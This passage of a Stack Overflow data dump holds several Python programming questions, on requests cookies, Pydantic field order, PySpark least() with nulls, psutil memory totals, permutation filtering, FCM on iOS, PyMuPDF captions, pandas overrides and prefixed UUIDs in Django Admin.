<pre><code>requests.get(base_url, proxies=proxies, headers=headers, cookies=cookies_sc)
</code></pre>
<p>where</p>
<pre><code>from http.cookies import SimpleCookie
cookies_sc = SimpleCookie("....") # 37 cookies
</code></pre>
<p>where the string <code>"...."</code> comes from the Chrome debug console <code>document.cookie</code>.
(<code>browser_cookie3.chrome</code> no longer works, see <a href="https://github.com/borisbabic/browser_cookie3/issues/180" rel="nofollow noreferrer">Access to cookie file denied on chrome</a> and <a href="https://github.com/borisbabic/browser_cookie3/issues/210" rel="nofollow noreferrer">Broken decryption in Chrome</a>).</p>
<p>There are a handful of cookies in <code>cookies_sc</code> that are not in <code>cookies_ff</code>, but adding them to <code>cookies_ff</code> does <strong>not</strong> solve the problem.</p>
<p>So, how do I access the URL with the auto-extracted Firefox cookies?</p>
|
<python><cookies><python-requests><http-proxy>
|
2025-01-16 22:40:00
| 0
| 60,468
|
sds
|
79,363,016
| 1,394,353
|
Pydantic multiple inheritance field order - implementation detail or stable feature?
|
<p>I have multiple models which will be very similar. The identifier fields are different; otherwise, the other groups of fields occur in predefined patterns. For example, with respect to the sample below, the <code>present0</code> and <code>present1</code> fields will appear in some models, but not in others.</p>
<p>Ultimately the models are used to transform polars dataframes to json data for consumption by <a href="https://tabulator.info" rel="nofollow noreferrer">Tabulator</a> - an HTML/JS table formatting library, so order definitely matters and the models are a good place to carry that info. I've even embedded formatting directives for Tabulator using <code>Annotated</code>.</p>
<p>So what I want to do is to define smaller sub-models with what's specific to each model as well as the definition of recurring field groups. Then assemble them via multiple inheritance.</p>
<p>There was a <a href="https://github.com/pydantic/pydantic/discussions/5974" rel="nofollow noreferrer">question</a> on their forums that addresses building models via multiple inheritance, and while the person answering was hesitant to endorse that approach, they did say providing that functionality was a stable part of Pydantic behavior.</p>
<p><strong>However, what about the <em>ordering</em> of fields, which seems to happen in reverse <code>mro</code> order?</strong></p>
<h4>Data samples:</h4>
<pre><code> Project shape: (2, 7)
┌─────────┬───────┬──────────┬──────────┬───────────┬─────────────┬─────────────┐
│ project ┆ descr ┆ present0 ┆ present1 ┆ usercount ┆ lastupdater ┆ lastupddttm │
│ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- │
│ str ┆ str ┆ i64 ┆ i64 ┆ i64 ┆ str ┆ str │
╞═════════╪═══════╪══════════╪══════════╪═══════════╪═════════════╪═════════════╡
│ project ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ mcuban ┆ 2009 │
│ project ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ mcuban ┆ 2009 │
└─────────┴───────┴──────────┴──────────┴───────────┴─────────────┴─────────────┘
Customer shape: (2, 7)
┌──────────┬───────┬──────────┬──────────┬───────────┬─────────────┬─────────────┐
│ customer ┆ descr ┆ present0 ┆ present1 ┆ usercount ┆ lastupdater ┆ lastupddttm │
│ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- │
│ str ┆ str ┆ i64 ┆ i64 ┆ i64 ┆ str ┆ str │
╞══════════╪═══════╪══════════╪══════════╪═══════════╪═════════════╪═════════════╡
│ proj ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ jsmith ┆ 1999 │
│ proj ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ jsmith ┆ 1999 │
└──────────┴───────┴──────────┴──────────┴───────────┴─────────────┴─────────────┘
</code></pre>
<h4>Test code - <code>T2project_rev_order_columns</code> gives the correct order</h4>
<pre><code>import sys
from rich import inspect as rin
import pydantic as pyd
import polars as pl
verbose = "-v" in sys.argv
class Project(pyd.BaseModel):
"""my reference field order"""
project : str = "project"
descr : str = "d"
present0 : int = 0
present1 : int = 1
usercount : int = 77
lastupdater : str = "mcuban"
lastupddttm : str = "2009"
class Customer(pyd.BaseModel):
customer : str = "proj"
descr : str = "d"
present0 : int = 0
present1 : int = 1
usercount : int = 77
lastupdater : str = "jsmith"
lastupddttm : str = "1999"
# assemble by components
class KProject(pyd.BaseModel):
project : str = "project"
descr : str = "d"
class Pres(pyd.BaseModel):
present0 : int = 0
present1 : int = 1
class Tag(pyd.BaseModel):
usercount : int = 77
class Upd(pyd.BaseModel):
lastupdater : str = "jsmith"
lastupddttm : str = "1999"
class T1project_order_columns(KProject, Pres, Tag, Upd):
pass
class T2project_rev_order_columns(Upd, Tag, Pres, KProject):
"""ordering works, but is that guaranteed by Pydantic?"""
def test():
def build_df(cls_):
df = pl.from_dicts([cls_().model_dump() for i in range(0,2)])
if verbose:
print("\n\n", cls_.__name__, df)
return df.columns
dataexp = [
Project,
Customer,
T1project_order_columns,
T2project_rev_order_columns,
]
for cls_ in dataexp:
got = build_df(cls_)
if cls_ is Project:
exp = got
classname = f"{cls_.__name__:30.30}"
if not classname.startswith("T"):
continue
if exp == got:
print(f"✅ {classname}\n")
else:
msg2 = f"❌ {classname}"
print(f"{msg2} exp:{','.join(exp)}\n{' ' * (len(msg2)+2)}got:{','.join(got)}\n")
test()
</code></pre>
<h4>output:</h4>
<pre><code>❌ T1project_order_columns exp:project,descr,present0,present1,usercount,lastupdater,lastupddttm
got:lastupdater,lastupddttm,usercount,present0,present1,project,descr
✅ T2project_rev_order_columns
</code></pre>
<h4>Question: is that ordering guaranteed or an implementation detail?</h4>
<hr />
<h4>p.s. for info only - embedding additional metadata directives into a model</h4>
<p>You can't use pydantic models in <code>Annotated</code> metadata; that raises a rather cryptic pydantic error. Non-pydantic data types, like dataclasses, work. The <code>Annotated</code> metadata is a tuple, so you'll have to loop through its constituents and route configuration to the interested components.</p>
<pre><code>from dataclasses import dataclass
from typing import Annotated, Any

@dataclass
class TabulatorSettings:
"use on Tab Models as Annotated dont use a pydantic model in Annotated metadata"
urlField: str = ""
title: str = ""
formatter: str = ""
class CompareGeneral_TabData(pyd.BaseModel):
label: str
value: Annotated[Any, TabulatorSettings(title="Left", formatter="html", width=100)]
value_oth: Annotated[Any, TabulatorSettings(title="Right", formatter="html", width=100)]
</code></pre>
|
<python><pydantic>
|
2025-01-16 20:39:19
| 0
| 12,224
|
JL Peyret
|
79,362,888
| 9,245,853
|
Unexpected output from least (source data includes nulls)
|
<p>Inspired by this <a href="https://stackoverflow.com/a/37675525">answer</a>, I want to find the row-wise minimum between several date columns, and return the column name.</p>
<p>I'm getting unexpected results when a row contains NULLs, which I thought <a href="https://spark.apache.org/docs/latest/api/python/reference/pyspark.sql/api/pyspark.sql.functions.least.html" rel="nofollow noreferrer"><code>least</code></a> excluded, specifically rows 2-5 in this toy example:</p>
<pre><code>import datetime as dt
from pyspark.sql import Row
from pyspark.sql import functions as F
from pyspark.sql.types import StructField, StructType, DateType
schema = StructType([
StructField("date1", DateType(), True),
StructField("date2", DateType(), True),
StructField("date3", DateType(), True)
])
row1 = Row(dt.date(2024, 1, 1), dt.date(2024, 1, 2), dt.date(2024, 1, 3))
row2 = Row(None, None, dt.date(2024, 1, 3))
row3 = Row(None, dt.date(2024, 1, 1), dt.date(2024, 1, 2))
row4 = Row(None, None, None)
row5 = Row(dt.date(2024, 1, 1), None, None)
df = spark.createDataFrame([row1, row2, row3, row4, row5], schema)
def row_min(*cols):
cols_ = [F.struct(F.col(c).alias("value"), F.lit(c).alias("col")) for c in cols]
return F.least(*cols_)
df.withColumn("output", row_min('date1', 'date2', 'date3').col).show()
</code></pre>
<p>returns</p>
<pre><code>+----------+----------+----------+------+
| date1| date2| date3|output|
+----------+----------+----------+------+
|2024-01-01|2024-01-02|2024-01-03| date1|
| NULL| NULL|2024-01-03| date1|
| NULL|2024-01-01|2024-01-02| date1|
| NULL| NULL| NULL| date1|
|2024-01-01| NULL| NULL| date2|
+----------+----------+----------+------+
</code></pre>
<p>but the desired output is:</p>
<pre><code>+----------+----------+----------+------+
| date1| date2| date3|output|
+----------+----------+----------+------+
|2024-01-01|2024-01-02|2024-01-03| date1|
| NULL| NULL|2024-01-03| date3|
| NULL|2024-01-01|2024-01-02| date2|
| NULL| NULL| NULL| NULL|
|2024-01-01| NULL| NULL| date1|
+----------+----------+----------+------+
</code></pre>
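<p>The only workaround I have thought of so far - though I have not verified it is correct or idiomatic - is to build each struct only when its date is not null, so that <code>least</code> really has a null to skip:</p>
<pre><code>from pyspark.sql import functions as F

def row_min(*cols):
    # Wrap each struct in when(), so a row with a null date contributes NULL
    # instead of a struct whose first field is null.
    cols_ = [
        F.when(
            F.col(c).isNotNull(),
            F.struct(F.col(c).alias("value"), F.lit(c).alias("col")),
        )
        for c in cols
    ]
    return F.least(*cols_)

df.withColumn("output", row_min('date1', 'date2', 'date3').col).show()
</code></pre>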
|
<python><apache-spark><pyspark>
|
2025-01-16 19:47:02
| 1
| 50,375
|
BigBen
|
79,362,783
| 4,470,052
|
Snowflake modin.pandas data frame can’t write to snowflake without all columns matching
|
<p>Snowflake's modin.pandas DataFrame <code>df</code> has 7 columns.
The Snowflake table "Db.S.table" has 10 columns - one auto-increment and most of them nullable.</p>
<p>I’m not able to do <code>session.write_pandas(df,database=“Db”,schema=“schema”,table_name=“table”,overwrite=False)</code></p>
<p>It gives a column mismatch error. Why is this not an issue with native pandas?</p>
|
<python><pandas><snowflake-cloud-data-platform><snowflake-schema>
|
2025-01-16 18:59:41
| 1
| 692
|
Flyn Sequeira
|
79,362,776
| 1,457,380
|
Efficiently count lists with certain properties
|
<p>My purpose is to count permutations with certain properties. I first generate the permutations and then remove those that do not satisfy the desired properties. How could I improve the code to be able to enumerate more permutations?</p>
<pre><code>from itertools import permutations
def check(seq, verbose=False):
"""check that the elements of the sequence equal a difference of previous elements"""
n = len(seq)
for k in range(1, n-1):
# build a set of admissible values
dk = {abs(seq[i]-seq[j]) for i in range(0, k) for j in range(i+1, k+1) if i < j}
if k > 0 and verbose:
print('current index = ', k)
print('current subsequence = ', seq[:k+1])
print('current admissible values = ', dk)
print('next element = ', seq[k+1])
# check if the next element is in the set of admissible values
if k > 0 and seq[k+1] not in dk:
# return an invalid subsequence (k+2 to include the invalid element)
return seq[:k+2]
return seq
def is_valid(seq):
"""check that the sequence satisfies certain properties"""
n = len(seq)
if n < 3:
return False
if len(check(seq)) == n:
return True
return False
def filter_perms(perms):
for perm in perms:
if is_valid(perm): yield perm
def make_perms(n):
"""The elements of the list are integers, where a list of length n stores all integers from 1 to n."""
for p in permutations(range(1,n-1)):
yield (n,) + p + (n-1,)
def enumerate_perms(n):
perms = make_perms(n)
return filter_perms(perms)
# testing a good sequence
seq=(5, 2, 3, 1, 4)
check(seq, verbose=True)
is_valid(seq)
# True
# testing a bad sequence
seq=[5, 2, 1, 3, 4]
check(seq, verbose=True)
is_valid(seq)
# False
# testing permutations
tuple(make_perms(5))
# testing enumeration
tuple(enumerate_perms(5))
# ((5, 2, 3, 1, 4), (5, 3, 2, 1, 4))
len(tuple(enumerate_perms(14)))
# 29340
</code></pre>
<p>Summary of discussions in the comments section: Should I use numpy arrays? Should I save the permutations to a database?</p>
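<p>One idea I have been toying with, but have not benchmarked, is to build the sequences recursively and prune as soon as a prefix becomes invalid, instead of filtering full permutations afterwards (sketch only; the names are mine):</p>
<pre><code>def count_valid(n):
    """Count valid sequences of the form (n, ..., n-1) by extending
    prefixes only with admissible values, pruning invalid branches early."""
    middle = set(range(1, n - 1))

    def extend(prefix, remaining, diffs):
        if not remaining:
            # the fixed final element n-1 must itself be admissible
            return 1 if (n - 1) in diffs else 0
        total = 0
        for x in remaining & diffs:          # only admissible extensions
            new_diffs = diffs | {abs(x - p) for p in prefix}
            total += extend(prefix + [x], remaining - {x}, new_diffs)
        return total

    # the second element is unconstrained (the check starts at k = 1)
    total = 0
    for x in middle:
        total += extend([n, x], middle - {x}, {abs(n - x)})
    return total
</code></pre>
<p>As far as I can tell, <code>count_valid(5)</code> reproduces the 2 sequences counted above, but I have only tried it on small inputs.</p>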
|
<python><performance><permutation>
|
2025-01-16 18:56:38
| 1
| 10,646
|
PatrickT
|
79,362,761
| 1,937,197
|
Combined memory usage of a process and all its descendants
|
<p>In Python and on Linux, is there any way to determine the <em>joint</em> memory usage of a process and all its descendants (other processes it may have spawned)?</p>
<p>I'm aware of <code>memory_info().rss</code> in <code>psutil</code>. But I don't think simply adding the <em>rss</em>'es is correct here, since the processes may be sharing libraries and other memory among themselves.</p>
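<p>The closest idea I have come up with - and I am not sure it is the right metric - is summing the proportional set size (PSS) over the process tree, since PSS splits shared pages among the processes that share them (sketch, Linux only):</p>
<pre><code>import psutil

def tree_pss(pid):
    """Approximate joint usage: sum PSS over a process and its descendants."""
    root = psutil.Process(pid)
    procs = [root] + root.children(recursive=True)
    total = 0
    for p in procs:
        try:
            total += p.memory_full_info().pss  # reads /proc/<pid>/smaps
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            pass
    return total
</code></pre>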
|
<python><linux><psutil>
|
2025-01-16 18:47:31
| 0
| 12,727
|
MWB
|
79,362,710
| 3,294,994
|
How to tell hypothesis.strategies to choose not-None for optional fields
|
<p>I am a consumer of a class that I don't own:</p>
<pre class="lang-py prettyprint-override"><code>from dataclasses import dataclass
@dataclass
class Child:
f1: int
f2: int | None
@dataclass
class Parent:
child: Child
</code></pre>
<p>The actual class is much <em>much</em> deeper and wider.</p>
<p>To run manual tests (not pytest, not CI), I want to create an instance of <code>Parent</code> with random values.</p>
<pre class="lang-py prettyprint-override"><code>from typing import TypeVar
import hypothesis
import hypothesis.strategies
T = TypeVar("T")
def generate(cls: type[T], seed: int) -> T:
objects = []
@hypothesis.seed(seed)
@hypothesis.given(hypothesis.strategies.from_type(cls))
@hypothesis.settings(max_examples=10)
def f(o):
objects.append(o)
f()
    # First example tends to be a trivial one, so return the last one instead
return objects[-1]
print(generate(Parent, seed=1))
print(generate(Parent, seed=2))
</code></pre>
<p>output:</p>
<pre class="lang-none prettyprint-override"><code>Parent(child=Child(f1=1234, f2=None))
Parent(child=Child(f1=-10, f2=4567))
</code></pre>
<p>I don't care about the values in the instance, <strong>except</strong> I do <em>not</em> want <code>None</code>s for optional fields (I want <code>Child.f2</code> to be a random int, always). I don't want to maintain code to instantiate one because the class often changes.</p>
<p>How can I update the snippet to tell <code>hypothesis</code> to never choose <code>None</code>?</p>
|
<python><python-hypothesis>
|
2025-01-16 18:26:13
| 2
| 846
|
obk
|
79,362,656
| 11,628,437
|
How to compute weakest preconditions for class methods with object state in Python?
|
<p>I am working on a tool to compute weakest preconditions for certain Python programs, and I’m struggling with handling class objects and their variables. Here's a minimal example of the problem:</p>
<p>For a standalone function like this:</p>
<pre><code>def square_number(n):
return n * n
</code></pre>
<p>Computing the weakest precondition is straightforward. I can define a postcondition (e.g., <code>result == 25</code>) and then backtrack to derive the precondition (e.g., <code>n == 5 or n == -5</code>).</p>
<p>However, I’m unsure how to proceed when dealing with instance variables. For example:</p>
<pre><code>class NumberSquarer:
def __init__(self, k):
self.k = k
def square_number(self):
return self.k * self.k
# Example usage
squarer = NumberSquarer(5)
result = squarer.square_number() # Returns 25
</code></pre>
<p>In this case:</p>
<p>The <code>square_number</code> method depends on the instance variable <code>self.k</code>.
The postcondition could be something like <code>result == 25</code>.
My question is: How do I compute the weakest precondition for the method <code>square_number</code> given a postcondition, especially when the state is encapsulated in the object (e.g., <code>self.k</code>)?</p>
<p>If the method involves multiple instance variables or interactions between methods, how should I approach deriving the precondition systematically? Are there any tools or strategies (e.g., symbolic computation with libraries like SymPy) that can help?</p>
<hr />
<p>Based on the comments and <a href="https://softwarefoundations.cis.upenn.edu/plf-current/index.html" rel="nofollow noreferrer">this</a> book, this is how I derive the weakest preconditions for functions</p>
<p>Let <code>square_number(n)<25</code>,</p>
<p>then <code>n^2<25</code></p>
<p>then the precondition would be <code>-5 < n < 5</code>, i.e. <code>n < 5 and n > -5</code></p>
<p>I have no idea how to derive preconditions in the cases of classes and class variables. Please let me know if you have more questions.</p>
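<p>For the standalone case I can at least mechanise the last step with SymPy, which is roughly how I imagined treating <code>self.k</code> as just another symbolic input (a sketch, not verified for the class case):</p>
<pre><code>import sympy as sp

k = sp.Symbol('k', real=True)

# Postcondition on the result of square_number(): result < 25
postcondition = k * k < 25

# The weakest precondition on self.k is whatever makes the postcondition hold
precondition = sp.solveset(postcondition, k, domain=sp.S.Reals)
print(precondition)   # Interval.open(-5, 5), i.e. -5 < self.k < 5
</code></pre>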
|
<python><semantics><formal-verification><preconditions><formal-methods>
|
2025-01-16 18:05:21
| 0
| 1,851
|
desert_ranger
|
79,362,616
| 2,058,333
|
FCM notifications not showing on iOS lock screen
|
<p>I googled a bunch but cannot find a comprehensive answer.
I am getting my token like this:</p>
<pre><code>final notificationSettings = await FirebaseMessaging.instance.requestPermission(
alert: true,
announcement: true,
badge: false,
provisional: false,
sound: true
);
final token = await FirebaseMessaging.instance.getToken();
</code></pre>
<p>and send my notifications with python firebase messaging</p>
<pre><code>notification = messaging.Notification(
'Title',
'Text'
)
message = messaging.Message(
notification=notification,
token=token
)
messaging.send(message)
</code></pre>
<p>The notification arrives, but only in the iPhone notification center. It does not show on the lock screen like all other messages. Do I need to feed in some setting in the app to enable this?
I found that the provisional flag (initially I had it as true) triggers this behavior</p>
<p><a href="https://rnfirebase.io/messaging/ios-permissions#provisional-permission" rel="nofollow noreferrer">https://rnfirebase.io/messaging/ios-permissions#provisional-permission</a></p>
<p>but I have reset it to false and still my notifications do not show on the lock screen...</p>
|
<python><ios><flutter><firebase><firebase-cloud-messaging>
|
2025-01-16 17:51:12
| 2
| 5,698
|
El Dude
|
79,362,564
| 243,031
|
How to extract text associated with image from pdf?
|
<p>I am using <a href="https://pymupdf.readthedocs.io/en/latest/index.html" rel="nofollow noreferrer"><code>pymupdf</code></a> to extract images from PDF. Code sample is as below.</p>
<pre><code>import pymupdf
doc = pymupdf.open('sample.pdf')
page = doc[0] # get the page
image_list = page.get_images()
page_index = 0
for image_index, img in enumerate(image_list):
xref = img[page_index] # get the XREF of the image
pix = pymupdf.Pixmap(doc, xref) # create a Pixmap
if pix.n - pix.alpha > 3: # CMYK: convert to RGB first
pix = pymupdf.Pixmap(pymupdf.csRGB, pix)
pix.save("page_%s-image_%s.png" % (page_index, image_index))
</code></pre>
<p>I am able to extract image <a href="https://i.sstatic.net/TM9qyALJ.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/TM9qyALJ.png" alt="extracted_image" /></a> from sample pdf as</p>
<p><a href="https://i.sstatic.net/tn17zKyf.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/tn17zKyf.png" alt="sample_pdf" /></a></p>
<p>Now I want to extract the text associated with <code>Fig. 6.1</code>, which is supposed to return only <code>Fig. 6.1 Insect bites. Linear pruritic papules with central crusts demonstrating the “breakfast, lunch, and dinner” sign. Courtesy Antonio Torrelo, MD.</code></p>
<p>I tried <code>page.get_text("blocks")</code> and <code>page.get_text()</code>, but I am not sure how to relate only the <code>Fig. 6.1</code> text to the extracted image.</p>
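<p>My rough idea - which I have not managed to get working - is to take the rectangle of the image and pick the text block just below it, something like this sketch:</p>
<pre><code>import pymupdf

doc = pymupdf.open('sample.pdf')
page = doc[0]

xref = page.get_images()[0][0]            # xref of the first image
img_rect = page.get_image_rects(xref)[0]  # where that image sits on the page

# get_text("blocks") returns (x0, y0, x1, y1, text, block_no, block_type) tuples
below = [
    b for b in page.get_text("blocks")
    if b[6] == 0                                    # text blocks only
    and b[1] >= img_rect.y1                         # block starts below the image
    and b[0] < img_rect.x1 and b[2] > img_rect.x0   # horizontal overlap
]
if below:
    caption = min(below, key=lambda b: b[1])  # nearest block under the image
    print(caption[4])
</code></pre>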
|
<python><pdf><extract><image-text>
|
2025-01-16 17:33:31
| 1
| 21,411
|
NPatel
|
79,362,445
| 1,704,282
|
recursive get a list of the stream down dependencies in python
|
<p>I am trying to get a flattened list of dependencies.</p>
<pre><code>list_of_task_to_generate = [
{"version": "1", "dependency": []},
{"version": "2", "dependency": ["1"]},
{"version": "3", "dependency": ["2"]},
{"version": "4", "dependency": ["3"]},
{"version": "5", "dependency": []},
{"version": "6", "dependency": ["5"]},
]
desire_output = {
"1": ["2", "3", "4"],
"2": ["3", "4"],
"3": ["4"],
"4": [],
"5": ["6"],
"6": [],
}
</code></pre>
<p>This is what I have:</p>
<pre><code>from pprint import pprint
list_of_task_to_generate = [
{"version": "1", "dependency": []},
{"version": "2", "dependency": ["1"]},
{"version": "3", "dependency": ["2"]},
{"version": "4", "dependency": ["3"]},
{"version": "5", "dependency": []},
{"version": "6", "dependency": ["5"]},
]
def generate_result_recursive(list_of_tasks):
result = {}
def add_dependencies(task):
version = task["version"]
dependencies = task["dependency"]
if version not in result:
result[version] = []
for dep in dependencies:
if dep not in result:
result[dep] = []
result[dep].append(version)
# trying loop
for i in list_of_tasks:
if i["version"] == dep:
add_dependencies(i)
# or this list comprehencion with next
# add_dependencies(next(t for t in list_of_tasks if t["version"] == dep))
for task in list_of_tasks:
add_dependencies(task)
return result
answer = generate_result_recursive(list_of_task_to_generate)
pprint(answer)
</code></pre>
<p>The code generates the following, which has the right number of dependencies but not the right values:</p>
<pre><code>{
'1': ['2', '2', '2'],
'2': ['3', '3'],
'3': ['4'],
'4': [],
'5': ['6'],
'6': []
}
</code></pre>
<p>but I am hitting my head trying to see why it is not grabbing the next dependency; for example, the first item should give</p>
<pre><code>'1':['2', '3', '4']
</code></pre>
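<p>For comparison, this is the kind of recursive walk I was aiming for, although I am not sure it is the cleanest way (it builds a children map first and then collects descendants):</p>
<pre><code>def generate_result_transitive(list_of_tasks):
    # direct children: version -> versions that depend on it
    children = {t["version"]: [] for t in list_of_tasks}
    for t in list_of_tasks:
        for dep in t["dependency"]:
            children[dep].append(t["version"])

    def descendants(version, seen=None):
        seen = set() if seen is None else seen
        for child in children[version]:
            if child not in seen:
                seen.add(child)
                descendants(child, seen)
        return seen

    return {v: sorted(descendants(v)) for v in children}
</code></pre>
<p>On the sample data above this seems to produce <code>desire_output</code>, but I have not tested it beyond that.</p>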
<p>I appreciate the help guys =)</p>
|
<python><recursion><recursive-datastructures>
|
2025-01-16 16:49:02
| 2
| 1,862
|
pelos
|
79,362,414
| 2,886,575
|
Skipping rows in lazy generator chaining?
|
<p>I have a lazy chain of generators. I would like to chain a generator onto the output of these, but only onto a "range" subset of the output. Specifically, I would like to skip some rows:</p>
<pre><code>def foo():
yield "pickles"
yield from iter(range(4))
def bar(foo_numbers):
yield from (5*num for num in foo_numbers)
# how to construct foo_bar from `foo` and `bar`?
assert foo_bar == ['pickles', 0, 5, 10, 15]
</code></pre>
<p>Notice that the output <code>foo_bar</code> can be obtained from <code>foo</code> followed by <code>bar</code>, except <code>bar</code> should only apply to the first through nth element of the output of <code>foo</code> (skipping the zeroth element). Is there an easy way to have my generators skip <code>n</code> elements?</p>
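<p>The closest I have come is pulling the elements to skip off the iterator first and chaining them back on, roughly like this (I am not sure it is the idiomatic way):</p>
<pre><code>from itertools import chain, islice

def skip_then(gen, transform, n=1):
    """Pass the first n elements through untouched, apply transform to the rest."""
    it = iter(gen)
    head = list(islice(it, n))   # the elements to skip
    yield from chain(head, transform(it))

foo_bar = list(skip_then(foo(), bar, n=1))
assert foo_bar == ['pickles', 0, 5, 10, 15]
</code></pre>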
|
<python><generator>
|
2025-01-16 16:37:32
| 1
| 5,605
|
Him
|
79,362,404
| 3,302,016
|
Pandas Change values of a dataframe based on an override
|
<p>I have a pandas dataframe which looks something like this.</p>
<pre><code>orig | dest | type | class | BKT | BKT_order | value | fc_Cap | sc_Cap
-----+-------+-------+-------+--------+-----------+---------+--------+---------
AMD | TRY | SA | fc | MA | 1 | 12.04 | 20 | 50
AMD | TRY | SA | fc | TY | 2 | 11.5 | 20 | 50
AMD | TRY | SA | fc | NY | 3 | 17.7 | 20 | 50
AMD | TRY | SA | fc | MU | 4 | 09.7 | 20 | 50
AMD | TRY | PE | fc | RE | 1 | 09.7 | 20 | 50
AMD | TRY | PE | sc | EW | 5 | 07.7 | 20 | 50
NCL | MNK | PE | sc | PO | 2 | 08.7 | 20 | 50
NCL | MNK | PE | sc | TU | 3 | 12.5 | 20 | 50
NCL | MNK | PE | sc | MA | 1 | 16.7 | 20 | 50
</code></pre>
<p>Also i have an override Dataframe which may look something like this:</p>
<pre><code>orig | dest | type | max_BKT
-----+-------+-------+-----------
AMD | TRY | SA | TY
NCL | MNK | PE | PO
NCL | AGZ | PE | PO
</code></pre>
<p>What I want to do is modify the original dataframe such that, after comparing the <code>orig</code>, <code>dest</code>, <code>type</code> & <code>BKT</code> (with <code>max_BKT</code>) values, the <code>value</code> column for any rows which have a <code>BKT_order</code> higher than or equal to that of the <code>max_BKT</code> in the override DF is set to either <code>fc_Cap</code> or <code>sc_Cap</code>, depending on the <code>class</code> value.</p>
<p>For Example in above scenario,</p>
<p>Since the override DF sets <code>max_BKT</code> as <code>TY</code> for <code>AMD | TRY | SA</code>, and the bucket order for <code>TY</code> is <code>2</code> in the original DF, I need to set the <code>value</code> column equal to <code>fc_Cap</code> or <code>sc_Cap</code>,
depending on the value of <code>class</code>, for all rows where <code>BKT_order</code> >= <code>2</code></p>
<p>So basically:</p>
<ul>
<li>filter the rows for <code>orig</code> <code>dest</code> <code>type</code> combination</li>
<li>Get the <code>BKT_order</code> of <code>max_BKT</code> from the Original DF</li>
<li>for each row that matches the above criteria
<ul>
<li>if <code>class == fc</code> update value column with fc_Cap</li>
<li>if <code>class == sc</code> update value column with sc_Cap</li>
</ul>
</li>
</ul>
<p>So the resulting DF should look something like this:</p>
<pre><code>orig | dest | type | class | BKT | BKT_order | value | fc_Cap | sc_Cap
-----+-------+-------+-------+--------+-----------+---------+--------+---------
AMD | TRY | SA | fc | MA | 1 | 12.04 | 20 | 50
AMD | TRY | SA | fc | TY | 2 | 20 | 20 | 50
AMD | TRY | SA | fc | NY | 3 | 20 | 20 | 50
AMD | TRY | SA | fc | MU | 4 | 20 | 20 | 50
AMD | TRY | PE | fc | RE | 1 | 09.7 | 20 | 50
AMD | TRY | PE | sc | EW | 5 | 07.7 | 20 | 50
NCL | MNK | PE | sc | PO | 2 | 50 | 20 | 50
NCL | MNK | PE | sc | TU | 3 | 50 | 20 | 50
NCL | MNK | PE | sc | MA | 1 | 16.7 | 20 | 50
</code></pre>
<p>I have tried iterating over the override DF and handling one row at a time, but I get stuck when I need to do a reverse lookup to get the <code>BKT_order</code> of the <code>max_BKT</code> from the original DF.</p>
<p>Hope that makes sense... I am fairly new to pandas.</p>
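<p>The direction I have been experimenting with - without success so far - is to turn the reverse lookup into a merge, roughly like the sketch below (it assumes the override frame is called <code>override</code>, and I have not verified it):</p>
<pre><code>import numpy as np

# reverse lookup: find the BKT_order that belongs to each override's max_BKT
lookup = df[['orig', 'dest', 'type', 'BKT', 'BKT_order']].rename(
    columns={'BKT': 'max_BKT', 'BKT_order': 'max_order'})
ov = override.merge(lookup, on=['orig', 'dest', 'type', 'max_BKT'], how='left')

# attach max_order to every row of the original frame
merged = df.merge(ov[['orig', 'dest', 'type', 'max_order']],
                  on=['orig', 'dest', 'type'], how='left')

# rows at or above the cap bucket (NaN max_order compares False, so untouched)
capped = (merged['BKT_order'] >= merged['max_order']).to_numpy()

df['value'] = np.where(capped & (df['class'] == 'fc'), df['fc_Cap'],
               np.where(capped & (df['class'] == 'sc'), df['sc_Cap'],
                        df['value']))
</code></pre>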
|
<python><pandas>
|
2025-01-16 16:33:22
| 2
| 4,859
|
Mohan
|
79,362,392
| 3,719,167
|
How to handle prefixed UUIDs in Django Admin for querying and displaying objects?
|
<p>I am working on a Django project with a custom UUIDField with a prefix (e.g., <code>ft_</code>) to represent IDs. The raw UUID is stored in the database, but I want the prefixed value (e.g., ft_) to be shown in API responses, admin interfaces, and elsewhere. However, this creates issues when querying objects in Django Admin because the URLs include the prefixed ID, and Django tries to query the database directly using this prefixed value.</p>
<p>Here is my custom field implementation:</p>
<pre class="lang-py prettyprint-override"><code>import uuid
from django.db import models
class PrefixedUUIDField(models.UUIDField):
def __init__(self, prefix, *args, **kwargs):
self.prefix = prefix
super().__init__(*args, **kwargs)
def from_db_value(self, value, expression, connection):
if value is None:
return value
return f"{self.prefix}_{value}"
def get_prep_value(self, value):
if isinstance(value, str) and value.startswith(f"{self.prefix}_"):
value = value.split(f"{self.prefix}_")[1]
return super().get_prep_value(value)
def to_python(self, value):
if isinstance(value, uuid.UUID):
return f"{self.prefix}_{value.hex}"
if isinstance(value, str) and not value.startswith(f"{self.prefix}_"):
return f"{self.prefix}_{value}"
return value
</code></pre>
<p>The model:</p>
<pre class="lang-py prettyprint-override"><code>class FamilyTree(models.Model):
id = PrefixedUUIDField(prefix="ft", primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=255)
</code></pre>
<p>In Django Admin, the URL for editing an object looks like this:</p>
<pre class="lang-bash prettyprint-override"><code>http://admin.localhost:8000/family_tree/familytree/ft_5F5479ca65374d401d9466d57fc95e4072/change/
</code></pre>
<p>However, this causes the following error:</p>
<pre class="lang-none prettyprint-override"><code>invalid input syntax for type uuid: "ft_5F5479ca65374d401d9466d57fc95e4072"
</code></pre>
<p>I understand this happens because Django Admin tries to query the database using the prefixed id, but the database expects the raw UUID.</p>
<pre><code>originor__dev__app | Internal Server Error: /family_tree/familytree/ft_5F5479ca65374d401d9466d57fc95e4072/change/
originor__dev__app | Traceback (most recent call last):
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 89, in _execute
originor__dev__app | return self.cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/psycopg/cursor.py", line 723, in execute
originor__dev__app | raise ex.with_traceback(None)
originor__dev__app | psycopg.errors.InvalidTextRepresentation: invalid input syntax for type uuid: "ft_5479ca65374d401d9466d57fc95e4072"
originor__dev__app | LINE 1: ...familytree" WHERE "family_tree_familytree"."id" = 'ft_5479ca...
originor__dev__app | ^
originor__dev__app |
